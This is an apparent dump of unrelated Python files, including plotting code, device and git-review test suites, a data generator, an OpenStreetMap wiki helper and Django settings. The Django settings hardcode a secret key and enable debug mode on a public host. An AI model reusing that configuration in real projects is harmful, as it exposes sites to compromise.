from plotData import *
from mapFeature import *
def plot_decision_boundary(theta, X, y):
plot_data(X[:, 1:3], y)
if X.shape[1] <= 3:
# Only need two points to define a line, so choose two endpoints
plot_x = np.array([np.min(X[:, 1]) - 2, np.max(X[:, 1]) + 2])
# Calculate the decision boundary line
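# The boundary is where theta0 + theta1*x1 + theta2*x2 = 0, i.e.
# x2 = -(theta1*x1 + theta0) / theta2, which is what the next line computes.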
plot_y = (-1/theta[2]) * (theta[1]*plot_x + theta[0])
plt.plot(plot_x, plot_y)
plt.legend(['Decision Boundary', 'Admitted', 'Not admitted'], loc=1)
plt.axis([30, 100, 30, 100])
else:
# Here is the grid range
u = np.linspace(-1, 1.5, 50)
v = np.linspace(-1, 1.5, 50)
z = np.zeros((u.size, v.size))
# Evaluate z = theta*x over the grid
for i in range(0, u.size):
for j in range(0, v.size):
z[i, j] = np.dot(map_feature(u[i], v[j]), theta)
z = z.T
# Plot z = 0
# Notice you need to specify the range [0, 0]
cs = plt.contour(u, v, z, levels=[0], colors='r')
plt.legend([cs.collections[0]], ['Decision Boundary'])
plt.show()
|
py
|
1a5edaab6e5c35d0931a7dfba5ebaaf6cb398f58
|
import fcntl
import logging
import multiprocessing as mp
import os
import signal
import threading
import time
import conftest
import ophyd
import pytest
from pcdsdevices.interface import (BaseInterface, TabCompletionHelperClass,
get_engineering_mode, set_engineering_mode,
setup_preset_paths)
from pcdsdevices.sim import FastMotor, SlowMotor
logger = logging.getLogger(__name__)
@pytest.fixture(scope='function')
def slow_motor():
return SlowMotor(name='sim_slow')
@pytest.fixture(scope='function')
def fast_motor():
return FastMotor(name='sim_fast')
@pytest.mark.timeout(5)
def test_mv(fast_motor):
logger.debug('test_mv')
fast_motor(3, wait=True)
assert fast_motor.wm() == 3
fast_motor.mvr(1, wait=True)
assert fast_motor() == 4
@pytest.mark.timeout(5)
def test_umv(slow_motor):
logger.debug('test_umv')
start_position = slow_motor.position
delta = 2
slow_motor.umvr(delta)
assert slow_motor.position == start_position + delta
def test_camonitor(fast_motor):
logger.debug('test_camonitor')
pid = os.getpid()
def interrupt():
time.sleep(0.1)
os.kill(pid, signal.SIGINT)
threading.Thread(target=interrupt, args=()).start()
fast_motor.camonitor()
def test_mv_ginput(monkeypatch, fast_motor):
logger.debug('test_mv_ginput')
# Importing forces backend selection, so do inside method
from matplotlib import pyplot as plt # NOQA
def fake_plot(*args, **kwargs):
return
def fake_ginput(*args, **kwargs):
return [[12, 24]]
def fake_get_fignums(*args, **kwargs):
return local_get_fignums
monkeypatch.setattr(plt, 'plot', fake_plot)
monkeypatch.setattr(plt, 'ginput', fake_ginput)
monkeypatch.setattr(plt, 'get_fignums', fake_get_fignums)
def inner_test():
fast_motor.mv_ginput()
assert fast_motor.position == 12
fast_motor.move(0)
assert fast_motor.position == 0
local_get_fignums = True
inner_test()
local_get_fignums = False
inner_test()
fast_motor._limits = (-100, 100)
inner_test()
def test_presets(presets, fast_motor):
logger.debug('test_presets')
fast_motor.mv(4, wait=True)
fast_motor.presets.add_hutch('four', comment='four!')
fast_motor.mv(3, wait=True)
fast_motor.presets.add_hutch('zero', 0, comment='center')
fast_motor.presets.add_here_user('sample')
print(fast_motor.presets.positions)
assert fast_motor.wm_zero() == -3
assert fast_motor.wm_sample() == 0
assert fast_motor.wm_four() == 1
# Clear paths, refresh, should still exist
old_paths = fast_motor.presets._paths
setup_preset_paths()
assert not hasattr(fast_motor, 'wm_zero')
setup_preset_paths(**old_paths)
assert fast_motor.wm_zero() == -3
assert fast_motor.wm_sample() == 0
fast_motor.mv_zero(wait=True)
fast_motor.mvr(1, wait=True)
assert fast_motor.wm_zero() == -1
assert fast_motor.wm() == 1
# Sleep for one so we don't override old history
time.sleep(1)
fast_motor.presets.positions.zero.update_pos(comment='hats')
assert fast_motor.wm_zero() == 0
assert fast_motor.presets.positions.zero.pos == 1
assert len(fast_motor.presets.positions.zero.history) == 2
assert len(fast_motor.presets.positions.sample.history) == 1
repr(fast_motor.presets.positions.zero)
fast_motor.presets.positions.zero.deactivate()
with pytest.raises(AttributeError):
fast_motor.wm_zero()
with pytest.raises(AttributeError):
fast_motor.presets.positions.zero
fast_motor.umv_sample()
assert fast_motor.wm() == 3
fast_motor.presets.positions.sample.update_comment('hello there')
assert len(fast_motor.presets.positions.sample.history) == 2
def block_file(path, lock):
with open(path, 'r+') as f:
fcntl.flock(f, fcntl.LOCK_EX)
lock.acquire()
fcntl.flock(f, fcntl.LOCK_UN)
path = fast_motor.presets.positions.sample.path
lock = mp.Lock()
with lock:
proc = mp.Process(target=block_file, args=(path, lock))
proc.start()
time.sleep(0.2)
assert fast_motor.presets.positions.sample.pos == 3
fast_motor.presets.positions.sample.update_pos(2)
assert not hasattr(fast_motor, 'wm_sample')
fast_motor.presets.sync()
assert not hasattr(fast_motor, 'mv_sample')
proc.join()
fast_motor.presets.sync()
assert hasattr(fast_motor, 'mv_sample')
def test_presets_type(presets, fast_motor):
logger.debug('test_presets_type')
# Mess up the input types, fail before opening the file
with pytest.raises(TypeError):
fast_motor.presets.add_here_user(123)
with pytest.raises(TypeError):
fast_motor.presets.add_user(234234, 'cats')
def test_engineering_mode():
logger.debug('test_engineering_mode')
set_engineering_mode(False)
assert not get_engineering_mode()
set_engineering_mode(True)
assert get_engineering_mode()
def test_dir_whitelist_basic(fast_motor):
logger.debug('test_dir_whitelist_basic')
set_engineering_mode(False)
user_dir = dir(fast_motor)
set_engineering_mode(True)
eng_dir = dir(fast_motor)
assert len(eng_dir) > len(user_dir)
_TAB_COMPLETION_IGNORES = {'.areadetector.', }
def _should_check_tab_completion(cls):
"""Filter out classes for checking tab completion."""
if BaseInterface in cls.mro():
# Include any Devices that have BaseInterface
return True
fully_qualified_name = f'{cls.__module__}.{cls.__name__}'
if any(name in fully_qualified_name for name in _TAB_COMPLETION_IGNORES):
# This doesn't mix BaseInterface in, but that's OK - it's on our list
return False
# This doesn't mix BaseInterface in, this may be a bad thing: warn in
# the test.
return True
@pytest.mark.parametrize(
'cls',
[pytest.param(cls, id=f'{cls.__module__}.{cls.__name__}')
for cls in conftest.find_all_device_classes()
if _should_check_tab_completion(cls)]
)
def test_tab_completion(cls):
if BaseInterface not in cls.mro():
pytest.skip(f'{cls} does not inherit from the interface')
regex = cls._class_tab.build_regex()
if getattr(cls, 'tab_component_names', False):
for name in cls.component_names:
if getattr(cls, name).kind != ophyd.Kind.omitted:
assert regex.match(name) is not None
for name in getattr(cls, 'tab_whitelist', []):
assert regex.match(name) is not None
_STATUS_PRINT_IGNORES = {
'.AttenuatorCalculatorBase',
'.BadSlitPositionerBase',
'.DelayBase',
'.IPM_Det',
'.InOutPVStatePositioner',
'.KappaXYZStage',
'.PVPositionerComparator',
'.PVPositionerDone',
'.PVPositionerIsClose',
'.PseudoSingleInterface',
'.PulsePicker',
'.SlitsBase',
'.SyncAxesBase',
'.OffsetMotorBase',
}
def _should_check_status_prints(cls):
"""Filter out classes for checking ``status_info``."""
fully_qualified_name = f'{cls.__module__}.{cls.__name__}'
if any(name in fully_qualified_name for name in _STATUS_PRINT_IGNORES):
return False
# Otherwise, include any Devices that inherit from BaseInterface.
return BaseInterface in cls.mro()
@pytest.mark.parametrize(
'cls',
[pytest.param(cls, id=f'{cls.__module__}.{cls.__name__}')
for cls in conftest.find_all_device_classes()
if _should_check_status_prints(cls)
]
)
def test_smoke_status_prints(cls):
instance = conftest.best_effort_instantiation(cls)
status_info = instance.status_info()
print(instance.format_status_info(status_info))
def test_tab_helper_no_mixin():
class MyDevice:
...
helper = TabCompletionHelperClass(MyDevice)
with pytest.raises(AssertionError):
# Must mix in BaseInterface
helper.new_instance(MyDevice())
def test_tab_helper_class():
class MyDeviceBaseA(BaseInterface, ophyd.Device):
tab_whitelist = ['a']
a = 1
class MyDeviceBaseB:
tab_whitelist = ['b']
b = 2
class MyDevice(MyDeviceBaseA, MyDeviceBaseB):
tab_whitelist = ['c']
c = 3
foobar = 4
tab_component_names = True
cpt = ophyd.Component(ophyd.Signal)
assert MyDeviceBaseA._class_tab is not MyDevice._class_tab
assert {'a'}.issubset(MyDeviceBaseA._class_tab._includes)
assert {'a', 'b', 'c', 'cpt'}.issubset(MyDevice._class_tab._includes)
instance = MyDevice(name='instance')
tab = instance._tab
assert {'a', 'b', 'c', 'cpt'}.issubset(tab._includes)
for attr in ['a', 'b', 'c', 'cpt']:
assert attr in tab.get_filtered_dir_list()
assert 'foobar' not in tab.get_filtered_dir_list()
tab.add('foobar')
assert 'foobar' in tab.get_filtered_dir_list()
tab.remove('foobar')
assert 'foobar' not in tab.get_filtered_dir_list()
tab.add('foobar')
tab.reset()
assert 'foobar' not in tab.get_filtered_dir_list()
|
py
|
1a5edaea1ece7730661ea8f294179c8b7cfe53ee
|
# -*- coding: cp936 -*-
import numpy as np
import matplotlib.pyplot as plt
import random
def get_data(dim=2, classes=2, count=1000, train_ratio=0.8, scale=None, tightness=None, centroids=None, if_show=False):
'''
Generate data clusters randomly for classification tasks.
dim -> the dimension of the data vector
classes -> number of clusters
count -> total samples
train_ratio -> train data portion
scale -> magnitude of the data, should be > 1
tightness -> how close the data is to its centroid
centroids -> array of centers of each cluster, shape should be (B,...), where B is the number of classes
'''
if scale is None:
scale = classes / 2
elif scale < 1:
scale = 1
if tightness is None:
tightness = 0.05 * scale / classes
if centroids is None:# generate centroids for each class
centroids = (np.random.rand(classes,dim) - 0.5) * 2 * scale
X = []
Y = []
for i in range(classes): #generate data in each class
X.append(np.random.normal(0, tightness, (count // classes, dim)) + centroids[i])
Y += [i] * (count // classes)
for i in range(count - len(Y)):#pad to required count if division left a remainder
c_idx = np.random.randint(classes)
X.append(np.random.normal(0,tightness,(1,dim))+ centroids[c_idx])
Y.append(c_idx)
X = np.concatenate(X,0)
Y = np.array(Y)
p = np.random.permutation(count)
X = X[p]
Y = Y[p]
train_count = int(count * train_ratio)
X_train = X[:train_count]
X_test = X[train_count:]
Y_train = Y[:train_count]
Y_test = Y[train_count:]
if if_show: # show only the first two dimensions, may use t-sne later
if dim < 2:
plt.subplot(121)
plt.scatter(X_train[:],[0] * len(X_train))
for i in range(min(classes * 10,int(count * train_ratio))):
plt.text(X_train[i][0],0,str(Y_train[i]))
plt.subplot(122)
plt.scatter(X_test[:],[0] * len(X_test))
for i in range(min(classes * 10,int(count * (1 - train_ratio)))):
plt.text(X_test[i][0],0,str(Y_test[i]))
else:
plt.subplot(121)
plt.xlim(-1.5 * scale,1.5 * scale)
plt.ylim(-1.5 * scale,1.5 * scale)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
plt.scatter(X_train[:][:,0],X_train[:][:,1])
for i in range(min(classes * 10,int(count * train_ratio))):
plt.text(X_train[i][0],X_train[i][1],str(Y_train[i]))
plt.subplot(122)
plt.xlim(-1.5 * scale,1.5 * scale)
plt.ylim(-1.5 * scale,1.5 * scale)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
plt.scatter(X_test[:][:,0],X_test[:][:,1])
for i in range(min(classes * 10,int(count * (1 - train_ratio)))):
plt.text(X_test[i][0],X_test[i][1],str(Y_test[i]))
plt.show()
return X_train,Y_train,X_test,Y_test
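# ---------------------------------------------------------------------------
# Example usage (added for illustration, not part of the original module):
# draw a small 2-D, 3-class data set and report the split sizes.  The
# argument values are illustrative.
if __name__ == "__main__":
    X_train, Y_train, X_test, Y_test = get_data(
        dim=2, classes=3, count=300, train_ratio=0.8, if_show=False)
    print("train:", X_train.shape, Y_train.shape)  # (240, 2) (240,)
    print("test: ", X_test.shape, Y_test.shape)    # (60, 2) (60,)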
|
py
|
1a5edbdecc6d34df4900bfc63ff84e43ca583ff1
|
"""
Django settings for my_project project.
Generated by 'django-admin startproject' using Django 2.0.
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "keecm3wxmiefhilrhxjuhe"
MAIL_PSW = ""
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
"120.78.181.91:8000",
"localhost",
"0.0.0.0:8000",
"127.0.0.1",
"www.cqu.fun",
]
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.forms",
"operation",
"user",
"topic",
"captcha",
'Addon',
]
# Captcha
# CAPTCHA_CHALLENGE_FUNCT='captcha.helpers.math.challenge'
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "my_project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [os.path.join(BASE_DIR, "templates")],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"django.template.context_processors.media",
]
},
}
]
WSGI_APPLICATION = "my_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
"HOST": "120.78.181.91",
"PORT": 8000,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "zh-hans"
TIME_ZONE = "Asia/Shanghai"
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
STATICFILES_DIRS = [os.path.join(BASE_DIR, "staticfiles")]
STATIC_ROOT = os.path.join(BASE_DIR, "static")
AUTH_USER_MODEL = "user.User_Info"
MEDIA_URL = "/media/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
SESSION_COOKIE_AGE = 3600 * 2
# django_simple_captcha configuration
# Noise style
CAPTCHA_NOISE_FUNCTIONS = ('captcha.helpers.noise_arcs', 'captcha.helpers.noise_dots')
# CAPTCHA_NOISE_FUNCTIONS = ("captcha.helpers.noise_null",)
CAPTCHA_IMAGE_SIZE = (100, 25)
# CAPTCHA_BACKGROUND_COLOR = '#ffffff'
CAPTCHA_CHALLENGE_FUNCT = (
"captcha.helpers.random_char_challenge"
)  # the image shows random English letters, e.g. "mdsh"
CAPTCHA_CHALLENGE_FUNCT = 'captcha.helpers.math_challenge'  # the image shows an arithmetic expression, e.g. "1+2="; overrides the setting above
CAPTCHA_LENGTH = 4  # number of characters
|
py
|
1a5edd0df93ad4c52a5041b8d1fd9ec0b3446033
|
# -*- coding: utf8 -*-
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
from git_review import tests
class GitReviewTestCase(tests.BaseGitReviewTestCase):
"""Class for the git-review tests."""
def test_cloned_repo(self):
"""Test git-review on the just cloned repository."""
self._simple_change('test file modified', 'test commit message')
self.assertNotIn('Change-Id:', self._run_git('log', '-1'))
self.assertIn('remote: New Changes:', self._run_git_review())
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def _configure_gitreview_username(self):
self._run_git('config', '--add', 'gitreview.username', 'test_user')
def test_git_review_s(self):
"""Test git-review -s."""
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_s_in_detached_head(self):
"""Test git-review -s in detached HEAD state."""
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
master_sha1 = self._run_git('rev-parse', 'master')
self._run_git('checkout', master_sha1)
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_s_with_outdated_repo(self):
"""Test git-review -s with a outdated repo."""
self._simple_change('test file to outdate', 'test commit message 1')
self._run_git('push', 'origin', 'master')
self._run_git('reset', '--hard', 'HEAD^')
# Review setup with an outdated repo
self._run_git('remote', 'rm', 'gerrit')
self._configure_gitreview_username()
self._run_git_review('-s')
self._simple_change('test file modified', 'test commit message 2')
self.assertIn('Change-Id:', self._run_git('log', '-1'))
def test_git_review_d(self):
"""Test git-review -d."""
self._run_git_review('-s')
# create new review to be downloaded
self._simple_change('test file modified', 'test commit message')
self._run_git_review()
change_id = self._run_git('log', '-1').split()[-1]
shutil.rmtree(self.test_dir)
# download clean Git repository and fresh change from Gerrit to it
self._run_git('clone', self.project_uri)
self._run_git('remote', 'add', 'gerrit', self.project_uri)
self._run_git_review('-d', change_id)
self.assertIn('test commit message', self._run_git('log', '-1'))
# second download should also work correctly
self._run_git_review('-d', change_id)
self.assertIn('test commit message', self._run_git('show', 'HEAD'))
self.assertNotIn('test commit message',
self._run_git('show', 'HEAD^1'))
def test_multiple_changes(self):
"""Test git-review asks about multiple changes.
Should register the user's wish to send two change requests, both via
the interactive 'yes' prompt and via the -y option.
"""
self._run_git_review('-s')
# 'yes' message
self._simple_change('test file modified 1st time',
'test commit message 1')
self._simple_change('test file modified 2nd time',
'test commit message 2')
review_res = self._run_git_review(confirm=True)
self.assertIn("Type 'yes' to confirm", review_res)
self.assertIn("Processing changes: new: 2", review_res)
# abandon changes sent to the Gerrit
head = self._run_git('rev-parse', 'HEAD')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_gerrit_cli('review', '--abandon', head)
self._run_gerrit_cli('review', '--abandon', head_1)
# -y option
self._simple_change('test file modified 3rd time',
'test commit message 3')
self._simple_change('test file modified 4th time',
'test commit message 4')
review_res = self._run_git_review('-y')
self.assertIn("Processing changes: new: 2", review_res)
def test_need_rebase_no_upload(self):
"""Test change needing a rebase does not upload."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some other message',
'create conflict with master')
exc = self.assertRaises(Exception, self._run_git_review)
self.assertIn("Errors running git rebase -p -i remotes/gerrit/master",
exc.args[0])
def test_upload_without_rebase(self):
"""Test change not needing a rebase can upload without rebasing."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message',
'just another file (no conflict)',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v')
self.assertIn("Running: git rebase -p -i remotes/gerrit/master",
review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head_1)
def test_no_rebase_check(self):
"""Test -R causes a change to be uploaded without rebase checking."""
self._run_git_review('-s')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v', '-R')
self.assertNotIn('rebase', review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head_1)
def test_rebase_anyway(self):
"""Test -F causes a change to be rebased regardless."""
self._run_git_review('-s')
head = self._run_git('rev-parse', 'HEAD')
head_1 = self._run_git('rev-parse', 'HEAD^1')
self._run_git('checkout', '-b', 'test_branch', head_1)
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
review_res = self._run_git_review('-v', '-F')
self.assertIn('rebase', review_res)
self.assertEqual(self._run_git('rev-parse', 'HEAD^1'), head)
def _assert_branch_would_be(self, branch):
output = self._run_git_review('-n')
# last non-empty line should be:
# git push gerrit HEAD:refs/publish/master
last_line = output.strip().split('\n')[-1]
branch_was = last_line.rsplit(' ', 1)[-1].split('/', 2)[-1]
self.assertEqual(branch, branch_was)
def test_detached_head(self):
"""Test on a detached state: we shouldn't have '(detached' as topic."""
self._run_git_review('-s')
curr_branch = self._run_git('rev-parse', '--abbrev-ref', 'HEAD')
# Note: git checkout --detach has been introduced in git 1.7.5 (2011)
self._run_git('checkout', curr_branch + '^0')
self._simple_change('some new message', 'just another file',
self._dir('test', 'new_test_file.txt'))
# switch to French, 'git branch' should return '(détaché du HEAD)'
lang_env = os.getenv('LANG', 'C')
os.environ.update(LANG='fr_FR.UTF-8')
try:
self._assert_branch_would_be(curr_branch)
finally:
os.environ.update(LANG=lang_env)
def test_bug_topic(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change for bug 123')
self._assert_branch_would_be('master/bug/123')
def test_bug_topic_newline(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change not for bug\n123')
self._assert_branch_would_be('master')
def test_bp_topic(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change for blueprint asdf')
self._assert_branch_would_be('master/bp/asdf')
def test_bp_topic_newline(self):
self._run_git_review('-s')
self._simple_change('a change', 'new change not for bluepring\nasdf')
self._assert_branch_would_be('master')
def test_git_review_l(self):
self._run_git_review('-s')
# Populate "project" repo
self._simple_change('project: test1', 'project: change1, merged')
self._simple_change('project: test2', 'project: change2, open')
self._simple_change('project: test3', 'project: change3, abandoned')
self._run_git_review('-y')
head = self._run_git('rev-parse', 'HEAD')
head_2 = self._run_git('rev-parse', 'HEAD^^')
self._run_gerrit_cli('review', head_2, '--code-review=+2', '--submit')
self._run_gerrit_cli('review', head, '--abandon')
# Populate "project2" repo
self._run_gerrit_cli('create-project', '--empty-commit', '--name',
'test/test_project2')
project2_uri = self.project_uri.replace('test/test_project',
'test/test_project2')
self._run_git('fetch', project2_uri, 'HEAD')
self._run_git('checkout', 'FETCH_HEAD')
self._simple_change('project2: test1', 'project2: change1, open')
self._run_git('push', project2_uri, 'HEAD:refs/for/master')
# Only project1 open changes
result = self._run_git_review('-l')
self.assertNotIn('project: change1, merged', result)
self.assertIn('project: change2, open', result)
self.assertNotIn('project: change3, abandoned', result)
self.assertNotIn('project2:', result)
class HttpGitReviewTestCase(tests.HttpMixin, GitReviewTestCase):
"""Class for the git-review tests over HTTP(S)."""
def _configure_gitreview_username(self):
# trick to set http password
self._run_git('config', '--add', 'gitreview.username',
'test_user:test_pass')
|
py
|
1a5eddc8aaa61266afbe1c010cc9557747d69a78
|
import random
def embaralha(texto):
lista = list(texto)
random.shuffle(lista)
    return ''.join(lista)  # join the shuffled characters back into a string
texto = input('Enter some text: ')
print(embaralha(texto))
|
py
|
1a5ede406e51adc122680ddd030ac2edc1066adf
|
"""
Automate OpenStreetMap wiki editing.
"""
import re
from pathlib import Path
from typing import Optional
from map_machine.doc.collections import Collection
from map_machine.map_configuration import MapConfiguration
from map_machine.osm.osm_reader import Tags
from map_machine.pictogram.icon import Icon, ShapeExtractor
from map_machine.scheme import Scheme
from map_machine.workspace import Workspace
WORKSPACE: Workspace = Workspace(Path("temp"))
SCHEME: Scheme = Scheme.from_file(WORKSPACE.DEFAULT_SCHEME_PATH)
EXTRACTOR: ShapeExtractor = ShapeExtractor(
WORKSPACE.ICONS_PATH, WORKSPACE.ICONS_CONFIG_PATH
)
HEADER_PATTERN: re.Pattern = re.compile("==?=?.*==?=?")
HEADER_2_PATTERN: re.Pattern = re.compile("== .* ==")
HEADER_PATTERNS: list[re.Pattern] = [
re.compile("==\\s*Example.*=="),
re.compile("==\\s*See also\\s*=="),
]
RENDERING_HEADER_PATTERN: re.Pattern = re.compile("==\\s*Rendering.*==")
ROENTGEN_HEADER_PATTERN: re.Pattern = re.compile("===.*Röntgen.*===")
class WikiTable:
"""SVG table with icon combinations."""
def __init__(self, collection: Collection, page_name: str):
self.collection: Collection = collection
self.page_name: str = page_name
def generate_wiki_table(self) -> tuple[str, list[Icon]]:
"""
Generate Röntgen icon table for the OpenStreetMap wiki page.
"""
icons: list[Icon] = []
text: str = '{| class="wikitable"\n'
if self.collection.column_key is not None:
text += f"! {{{{Key|{self.collection.column_key}}}}}"
else:
text += "! Tag || Icon"
if self.collection.row_tags:
text += "\n"
for current_tags in self.collection.row_tags:
text += "|-\n"
text += "| "
if current_tags:
for key, value in current_tags.items():
if value == "*":
text += f"{{{{Key|{key}}}}}<br />"
else:
text += f"{{{{Tag|{key}|{value}}}}}<br />"
text = text[:-6]
text += "\n"
icon, _ = SCHEME.get_icon(
EXTRACTOR,
current_tags | self.collection.tags,
set(),
MapConfiguration(ignore_level_matching=True),
)
icons.append(icon.main_icon)
text += (
"| "
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
text += "|}\n"
return text, icons
if not self.collection.column_values:
self.collection.column_values = [""]
else:
make_vertical: bool = False
for column_value in self.collection.column_values:
if column_value and len(column_value) > 2:
make_vertical = True
for column_value in self.collection.column_values:
text += " ||"
if column_value:
tag: str = (
f"{{{{TagValue|"
f"{self.collection.column_key}|{column_value}}}}}"
)
text += " " + (
f"{{{{vert header|{tag}}}}}" if make_vertical else tag
)
text += "\n"
for row_value in self.collection.row_values:
text += "|-\n"
if row_value:
text += f"| {{{{Tag|{self.collection.row_key}|{row_value}}}}}\n"
else:
text += "|\n"
for column_value in self.collection.column_values:
current_tags: Tags = dict(self.collection.tags) | {
self.collection.row_key: row_value
}
if column_value:
current_tags |= {self.collection.column_key: column_value}
icon, _ = SCHEME.get_icon(EXTRACTOR, current_tags, set())
if not icon:
print("Icon was not constructed.")
text += (
"| "
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
icons.append(icon.main_icon)
text += "|}\n"
return text, icons
def generate_new_text(
old_text: str,
table: WikiTable,
) -> tuple[Optional[str], list[Icon]]:
"""
    Generate new OpenStreetMap wiki page text with the Röntgen icon table.
:param old_text: previous wiki page text
:param table: wiki table generator
:return: new wiki page text
"""
wiki_text: str
icons = []
if table.collection.row_key or table.collection.row_tags:
wiki_text, icons = table.generate_wiki_table()
else:
processed = set()
icon, _ = SCHEME.get_icon(
EXTRACTOR, table.collection.tags, processed, MapConfiguration()
)
if not icon.main_icon.is_default():
wiki_text = (
f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n"
)
icons.append(icon.main_icon)
elif icon.extra_icons:
wiki_text = (
f"Röntgen icon set has additional icon for the tag: "
f"[[Image:Röntgen {icon.extra_icons[0].get_name()}.svg|32px]]."
f"\n"
)
icons.append(icon.extra_icons[0])
else:
wiki_text = ""
lines: list[str] = old_text.split("\n")
# If rendering section already exists.
start: Optional[int] = None
end: int = -1
for index, line in enumerate(lines):
if HEADER_2_PATTERN.match(line):
if start is not None:
end = index
break
if RENDERING_HEADER_PATTERN.match(line):
start = index
if start is not None:
return (
"\n".join(lines[: start + 2])
+ "\n=== [[Röntgen]] icons in [[Map Machine]] ===\n"
+ f"\n{wiki_text}\n"
+ "\n".join(lines[end:])
), icons
# If Röntgen rendering section already exists.
start: Optional[int] = None
end: int = -1
for index, line in enumerate(lines):
if HEADER_PATTERN.match(line):
if start is not None:
end = index
break
if ROENTGEN_HEADER_PATTERN.match(line):
start = index
if start is not None:
return (
"\n".join(lines[: start + 2])
+ f"\n{wiki_text}\n"
+ "\n".join(lines[end:])
), icons
# Otherwise.
headers: list[Optional[int]] = [None, None]
for index, line in enumerate(lines):
for i, pattern in enumerate(HEADER_PATTERNS):
if pattern.match(line):
headers[i] = index
filtered = list(filter(lambda x: x is not None, headers))
header: int
if filtered:
header = filtered[0]
else:
lines += [""]
header = len(lines)
return (
"\n".join(lines[:header])
+ "\n== Rendering ==\n\n=== [[Röntgen]] icons in [[Map Machine]] "
"===\n\n" + wiki_text + "\n" + "\n".join(lines[header:])
), icons
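# Illustrative sketch (not part of the original module) of how the pieces above might be
# wired together. The Collection constructor arguments shown here are assumptions inferred
# from the attribute names used in WikiTable, not a confirmed signature:
#
#     collection = Collection(tags={"amenity": "bench"}, row_key="backrest",
#                             row_values=["yes", "no"])
#     table = WikiTable(collection, "Key:backrest")
#     new_text, icons = generate_new_text(old_page_text, table)
#
# new_text is the page text with a Röntgen rendering section inserted or replaced, and
# icons lists the Icon objects referenced by the generated table.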
|
py
|
1a5edf56e19944833e6083c289c4f3240362b0ea
|
import re
from django.conf import settings
SENSITIVE_KEYS = ['password', 'token', 'access', 'refresh']
if hasattr(settings, 'DRF_API_LOGGER_EXCLUDE_KEYS'):
